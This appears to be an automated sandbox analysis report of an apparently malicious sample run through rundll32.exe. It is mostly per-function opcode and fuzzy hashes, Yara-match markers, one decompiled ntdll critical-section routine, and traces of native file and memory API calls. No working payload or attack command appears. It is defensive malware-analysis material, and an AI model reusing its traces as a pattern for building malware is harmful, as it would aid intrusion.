Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 68980421a27f1074bd9adbe43627b612d7529bc8ec58917ca04a40605391b776
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 7AC02B70150840FBE7151F30CD02F147258F780A22F640354B224464F0D5289C00E100

Uniqueness

Uniqueness Score: -1.00%

Function 019276E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: f4261fa3b753586045eff6e10a358aa45f4bbde7db8a75ac8e2a47b81964a80e
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 87C08CB01411845AEB3F578DCE20B203A58AB6860AF48099CEA0B294A2C368A802C20A

Uniqueness

Uniqueness Score: -1.00%

Function 01933A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 937a349d97e4497d04a824fc26b6e3807d7d7b739475ed4d302a46bdb92a1d2e
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: FBC04C32180648BBC7126E45DD01F157B69E7E4B60F154021F6080B5618576ED61E598

Uniqueness

Uniqueness Score: -1.00%

Function 01937D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 3387123b4072d8dee852058ffce096b9bc1595d08134b03af7731e108aa0cfbb
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 14B092353019408FCE1ADF18C084B1533E8BB84B40B8400D0E404CBA21D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01942ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: b2280026755048e0ba6f8897a4fdd5a01030f0322b9ab71dcc91156284869455
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 15B01233C10451CFCF02EF40C650B197331FB40750F054490D00127930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 019599D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa093fe57414090cbfcf0a43549b6323b6a007b270171b09d3806e3fc53fae2a
Instruction ID: ce753546176c3efd86f078fff5f3ed1fcdcb987667310ba8d2d089510ab4ae1c
Opcode Fuzzy Hash: fa093fe57414090cbfcf0a43549b6323b6a007b270171b09d3806e3fc53fae2a
Instruction Fuzzy Hash: F39002A171110442D104619A440470640C9A7E1241F91C012A2684554CC96D8C616175

Uniqueness

Uniqueness Score: -1.00%

Function 019595F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a99012a380d407e4dda410c52227bc4c361a1bae8e02e2616f1441b4a90e08
Instruction ID: 7aa27e7290db30776be334ecc209a7574a5cac71da36066334c02e1c68103327
Opcode Fuzzy Hash: 83a99012a380d407e4dda410c52227bc4c361a1bae8e02e2616f1441b4a90e08
Instruction Fuzzy Hash: 6290027170110C02D104619A48046864089A7D0341F91C011A6554655EDAA988917171

Uniqueness

Uniqueness Score: -1.00%

Function 0195AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a073944769bc051be14c7c03563f52bb69c2e5b64ffb13c182fe3926f8508c16
Instruction ID: 403a4ae01edabbf4226e30e7d57b54c4d21f1482c03e00ed893e4b48b10cf1f0
Opcode Fuzzy Hash: a073944769bc051be14c7c03563f52bb69c2e5b64ffb13c182fe3926f8508c16
Instruction Fuzzy Hash: 09900271F05104129140719A4814646808AB7E0781B95C011A0A44554CCD988A5563F1

Uniqueness

Uniqueness Score: -1.00%

Function 01959520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db10bcd4c46012115fa99f1a5cced75ed50021e7806dc28db1321e19bbfff369
Instruction ID: fe81a8dd6a276213cc8f353b9f284e133bbaadb5a31d7a6bbea24b7e3244d8d9
Opcode Fuzzy Hash: db10bcd4c46012115fa99f1a5cced75ed50021e7806dc28db1321e19bbfff369
Instruction Fuzzy Hash: 379002E1701244924500A29A8404B0A8589A7E0241B91C016E1584560CC9698851A175

Uniqueness

Uniqueness Score: -1.00%

Function 01959950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2558a7b815ba9550713fa905639f53b04e1169747c3ee63167c9c1d919c3a540
Instruction ID: 089379d5dbfdb7e868e26658f20571193e328634f61b6dac484697a5d0dd30ad
Opcode Fuzzy Hash: 2558a7b815ba9550713fa905639f53b04e1169747c3ee63167c9c1d919c3a540
Instruction Fuzzy Hash: 859002A170150803D140659A48046074089A7D0342F91C011A2594555ECE6D8C517175

Uniqueness

Uniqueness Score: -1.00%

Function 01959560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932e9fe8c96ec11777815fd8b72a7842523aba5d9fc81a2ad581e9a9964ed889
Instruction ID: 7cc141728b3750d1656d8129061ff6e1cd4b7fe2e349abbefd3dd81e93e0ba70
Opcode Fuzzy Hash: 932e9fe8c96ec11777815fd8b72a7842523aba5d9fc81a2ad581e9a9964ed889
Instruction Fuzzy Hash: 76900265721104020145A59A060450B44C9B7D63913D1C015F1946590CCA6588656371

Uniqueness

Uniqueness Score: -1.00%

Function 019598A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06bb1d0aa3d9c5021c263ac8181a620c709088895006f066eb2f23c0051819f
Instruction ID: 20436e0c9731a169b71006d1ee10fbbeebf658e08789dcb01d98cd14d568dfe8
Opcode Fuzzy Hash: d06bb1d0aa3d9c5021c263ac8181a620c709088895006f066eb2f23c0051819f
Instruction Fuzzy Hash: 5E90026170110802D102619A4414606408DE7D1385FD1C012E1954555DCA698953B172

Uniqueness

Uniqueness Score: -1.00%

Function 01959820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c5ade4a9cc8ca9f0b9456d5f7a796f1d47670ce42140c2c66135a85540d066
Instruction ID: 9e6664358360bbdbdd6f52b267c8655c06f7b5ec5b6c1d70f6e69bbb33dee112
Opcode Fuzzy Hash: c5c5ade4a9cc8ca9f0b9456d5f7a796f1d47670ce42140c2c66135a85540d066
Instruction Fuzzy Hash: 0F90027174110802D141719A4404606408DB7D0281FD1C012A0954554ECA998A56BAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0195B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723562edf5ae1a47458f0672f7289d861e505b643dddc4ea5279ba2ac0cc4e4f
Instruction ID: 17122ba02b3059764496a39b5b57f643590521d42fb7b8070c9181851017536a
Opcode Fuzzy Hash: 723562edf5ae1a47458f0672f7289d861e505b643dddc4ea5279ba2ac0cc4e4f
Instruction Fuzzy Hash: 379002A1B01244434540B19A48044069099B7E13413D1C121A0984560CCAAC8855A2B5

Uniqueness

Uniqueness Score: -1.00%

Function 0195A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3719e3ee63069baf928b2c7a40193cf55cdd8e7a79aeee2859a639e65f9997fd
Instruction ID: 8cc0452c5b89c9663df27a6363608bf4d094c881c0d20688f6316174a5aca4eb
Opcode Fuzzy Hash: 3719e3ee63069baf928b2c7a40193cf55cdd8e7a79aeee2859a639e65f9997fd
Instruction Fuzzy Hash: CA90027170154402D140719A844460B9089B7E0341F91C411E0955554CCA598856A271

Uniqueness

Uniqueness Score: -1.00%

Function 0195A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 088194e609837c64da057974e632ab720368f5c9de533de882382ddf8f31c3fc
Instruction ID: e1d7a4b399634dc51c77ead8dfb6930e28e31259df87006e63b15d470653744b
Opcode Fuzzy Hash: 088194e609837c64da057974e632ab720368f5c9de533de882382ddf8f31c3fc
Instruction Fuzzy Hash: 4D900271701104529500A6DA5804A4A8189A7F0341B91D015A4544554CC99888616171

Uniqueness

Uniqueness Score: -1.00%

Function 01959B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac72ed79f49905867407c5b6a97a7bc668326124a946e963feed5bcde5c45e89
Instruction ID: 6e200a500351a54373d8c447154ef02345a9d8c678918dbe5fadc5f73cba3138
Opcode Fuzzy Hash: ac72ed79f49905867407c5b6a97a7bc668326124a946e963feed5bcde5c45e89
Instruction Fuzzy Hash: 4190026174110C02D140719A8414707408AE7D0641F91C011A0554554DCA5A896576F1

Uniqueness

Uniqueness Score: -1.00%

Function 01959730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81731791028bcaff7e6c7cd05bcf6e11127408406d5fe3bd97a3e4518704fbb
Instruction ID: 6e20e85970dafeb40b312c28754f201e8534664acc741a0514310ff0669489b6
Opcode Fuzzy Hash: c81731791028bcaff7e6c7cd05bcf6e11127408406d5fe3bd97a3e4518704fbb
Instruction Fuzzy Hash: DA900261B0510802D140719A54187064099A7D0241F91D011A0554554DCA9D8A5576F1

Uniqueness

Uniqueness Score: -1.00%

Function 01959770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3c94ffc9babb5174016641d787a70d031588268f32187eaa00e7a32d057eb2
Instruction ID: af8b14287357b7c0034b95bc8aff2ce289d34874504fbd46c4cd65ae6273bee5
Opcode Fuzzy Hash: 1e3c94ffc9babb5174016641d787a70d031588268f32187eaa00e7a32d057eb2
Instruction Fuzzy Hash: AF90026170514842D100659A5408A064089A7D0245F91D011A1594595DCA798851B171

Uniqueness

Uniqueness Score: -1.00%

Function 0195A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e051efcf0d2f69f0b2f9545abb51480ad8fc8ccd86f7fef94b95932141d518
Instruction ID: 067bb975a30fe0574294eb9f16be63bc42e5cd2c1232c12fcd96d0cba50cdbdb
Opcode Fuzzy Hash: 54e051efcf0d2f69f0b2f9545abb51480ad8fc8ccd86f7fef94b95932141d518
Instruction Fuzzy Hash: 0D90027570514842D500659A5804A874089A7D0345F91D411A095459CDCA988861B171

Uniqueness

Uniqueness Score: -1.00%

Function 01959760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07690f6c63dcf98c144749fdb0c144e29595d24edfdb0759f051b241cbcd26f4
Instruction ID: a4f01af9ffd3ebb5001192dcd27254b86d2eeb61359b2b31edd7733f7d2b4261
Opcode Fuzzy Hash: 07690f6c63dcf98c144749fdb0c144e29595d24edfdb0759f051b241cbcd26f4
Instruction Fuzzy Hash: F590027170110803D100619A55087074089A7D0241F91D411A0954558DDA9A88517171

Uniqueness

Uniqueness Score: -1.00%

Function 01959A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492feab1d8990590140c716bc1389a675d07de575d2429746c002328a202a728
Instruction ID: 5a46e4ab50da4f030f5e473538db3eb7d3199544a5a397bb94d4de6798c42934
Opcode Fuzzy Hash: 492feab1d8990590140c716bc1389a675d07de575d2429746c002328a202a728
Instruction Fuzzy Hash: 2D90026170154842D140629A4804B0F8189A7E1242FD1C019A4686554CCD5988556771

Uniqueness

Uniqueness Score: -1.00%

Function 019596D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fef11b4688640d014de2de41d90b98e316f1ce425637f7198465f6c143de4c
Instruction ID: f70187a92ce6245875f3e73f648a488c0284dbc98f3627af8d893303720938f5
Opcode Fuzzy Hash: a4fef11b4688640d014de2de41d90b98e316f1ce425637f7198465f6c143de4c
Instruction Fuzzy Hash: D790027170110C42D100619A4404B464089A7E0341F91C016A0654654DCA59C8517571

Uniqueness

Uniqueness Score: -1.00%

Function 01959610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ec04da49d09743866a67786507bb85523d662a9a08b16ed3bb0c907f99911d
Instruction ID: 32675f306f5c7e0f0b63e567cd2beae8e58aa068b689afdb67d435a352196551
Opcode Fuzzy Hash: 50ec04da49d09743866a67786507bb85523d662a9a08b16ed3bb0c907f99911d
Instruction Fuzzy Hash: 5A900271B0510C02D150719A44147464089A7D0341F91C011A0554654DCB998A5576F1

Uniqueness

Uniqueness Score: -1.00%

Function 01959A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5658f64e528b379e025efa0e536e1bcbfaecc452448a8efb3f1cee37b4cce71d
Instruction ID: c9ed344be6c6573d0eb1ac4e23effc2e4b960712125f82d7e5f0dcdea8f73ad5
Opcode Fuzzy Hash: 5658f64e528b379e025efa0e536e1bcbfaecc452448a8efb3f1cee37b4cce71d
Instruction Fuzzy Hash: 7890027170150802D100619A48087474089A7D0342F91C011A5694555ECAA9C8917571

Uniqueness

Uniqueness Score: -1.00%

Function 01959650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22c9e82d32cad7091ee94edd75c414914e6b966000f5aee502610e7993849e3
Instruction ID: 8e1539f785a86cbb594b14a46352673bfda368649d77a810a48adb49af155ce1
Opcode Fuzzy Hash: c22c9e82d32cad7091ee94edd75c414914e6b966000f5aee502610e7993849e3
Instruction Fuzzy Hash: AB90027170514C42D140719A4404A464099A7D0345F91C011A0594694DDA698D55B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 01959670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a1ec7a306ae40dad9d05c97ed45b3bae2d8f78b3a7dc3514f2673b867f0cf0a6
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 019AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E019AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0195CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E019A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E019A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x019afdda
0x019afde2
0x019afde5
0x019afdec
0x019afdfa
0x019afdff
0x019afe0a
0x019afe0f
0x019afe17
0x019afe1e
0x019afe19
0x019afe19
0x019afe19
0x019afe20
0x019afe21
0x019afe22
0x019afe25
0x019afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019AFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019AFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019AFE2B

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 6b2d1c18623f985947647f331fe87e17a053d626b6831cc6c21b503ca31fdcbe
Instruction ID: a7f27a1a7068f46d4b509a1afbe08cd460bb04d9e0a32d5766d7df6ae03341a0
Opcode Fuzzy Hash: 6b2d1c18623f985947647f331fe87e17a053d626b6831cc6c21b503ca31fdcbe
Instruction Fuzzy Hash: 68F0C232600601BFEA211A45DC06F27BF5AEB84B30F250215F62C661D1EA62B824D6E4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 852 Parent PID: 3388 rundll32.exeCOMMON

Executed Functions

Function 009081C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00903B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00903B97,007A002E,00000000,00000060,00000000,00000000), ref: 0090820D

Strings

.z`, xrefs: 009081FD, 00908208

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0706749e652345ac979f67cd3f5e1599a119b5d790a0bf3e08b624d425e4b802
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 3BF0B6B2200108AFCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0090839A, Relevance: 1.5, APIs: 1, Instructions: 49memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008F2D11,00002000,00003000,00000004), ref: 009083D9

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bf976636764368bfb2b3ccb16009752b05aa0f6acc973974d3636f3679888974
Instruction ID: f866d0c6f3b20d95ea327eec7e3430d19d9fc7688de6349e6d0feb4d3cb3ab65
Opcode Fuzzy Hash: bf976636764368bfb2b3ccb16009752b05aa0f6acc973974d3636f3679888974
Instruction Fuzzy Hash: F9011AB1200209AFCB04DF88DC85EAB73ADEF88710F108509FD4997281DA30E810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00908270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00903D52,5E972F59,FFFFFFFF,00903A11,?,?,00903D52,?,00903A11,FFFFFFFF,5E972F59,00903D52,?,00000000), ref: 009082B5

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 3de4805f1a61dd46bc26933df3f965c4434a57dff5f88e7eb64a14f0e88ef303
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F6F0A9B2200108AFCB14DF89DC85EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0090826A, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00903D52,5E972F59,FFFFFFFF,00903A11,?,?,00903D52,?,00903A11,FFFFFFFF,5E972F59,00903D52,?,00000000), ref: 009082B5

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: eab07282fc0a221cd0c67beba732a7d8c8aff93c9853618c9fff33e24e93b55a
Instruction ID: 779a53d7490ec2daf6fdd86a41b0e218e60fb52bb445f3ba4d6e43a2174e65e1
Opcode Fuzzy Hash: eab07282fc0a221cd0c67beba732a7d8c8aff93c9853618c9fff33e24e93b55a
Instruction Fuzzy Hash: EAF01DB6210045AFCB04DF98D890DEB77ADFF8C354B158649FE5D97202C634E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009083A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008F2D11,00002000,00003000,00000004), ref: 009083D9

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 6ce92373d61320aea6b961c4c63226c40e350d97fa6d8eeb322442520eb75ba3
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 23F01CB1200208AFCB14DF89CC81EA777ADAF88750F118548FE0897281C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009082F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00903D30,?,?,00903D30,00000000,FFFFFFFF), ref: 00908315

Memory Dump Source

Source File: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: dadde29bcf08bb14cc98e5f6ed46454d291e117433fa4c350452eae86666241d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: D4D01275200214ABD710EF98CC45F97775CEF44750F154555BA585B282C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04989840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498984A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1207040c7388af7a6eed4709f885aaa1e04e5693b9a7491f06dfe3ebed571812
Instruction ID: fccc2f87e5b18aec6eb3e7f95e47ca2064cf109977760cecb830ebacfabaaf0e
Opcode Fuzzy Hash: 1207040c7388af7a6eed4709f885aaa1e04e5693b9a7491f06dfe3ebed571812
Instruction Fuzzy Hash: 79900261242141527945B15D45445074086A7F0285791C122A1405950C9566EC56E671

Uniqueness

Uniqueness Score: -1.00%

Function 04989860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0498986A

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb807dc32155c0244c6f82b9487368b7a0bc8f69e1df8424d7e71763460ad8fc
Instruction ID: 802e85b16172b9badd73c8fb01b7ac80920d564cb9dfc6a5751126924b963ed5
Opcode Fuzzy Hash: bb807dc32155c0244c6f82b9487368b7a0bc8f69e1df8424d7e71763460ad8fc
Instruction Fuzzy Hash: 1F90027120110413F511615D4644707008997E0285F91C522A0415558DA696DD52B171

Uniqueness

Uniqueness Score: -1.00%

Function 049899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049899AA

Memory Dump Source

Source File: 00000009.00000002.483315282.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: true

Associated: 00000009.00000002.484128590.0000000004A3B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484153846.0000000004A3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 721ef579f4066f96520de75bd66cab422ff87f94c98b587628c58e8b518418e5
Instruction ID: 305782eff60a095b05f3635bde6901e67c9e6a7dd8deeb4184fc2922e7278e31
Opcode Fuzzy Hash: 721ef579f4066f96520de75bd66cab422ff87f94c98b587628c58e8b518418e5
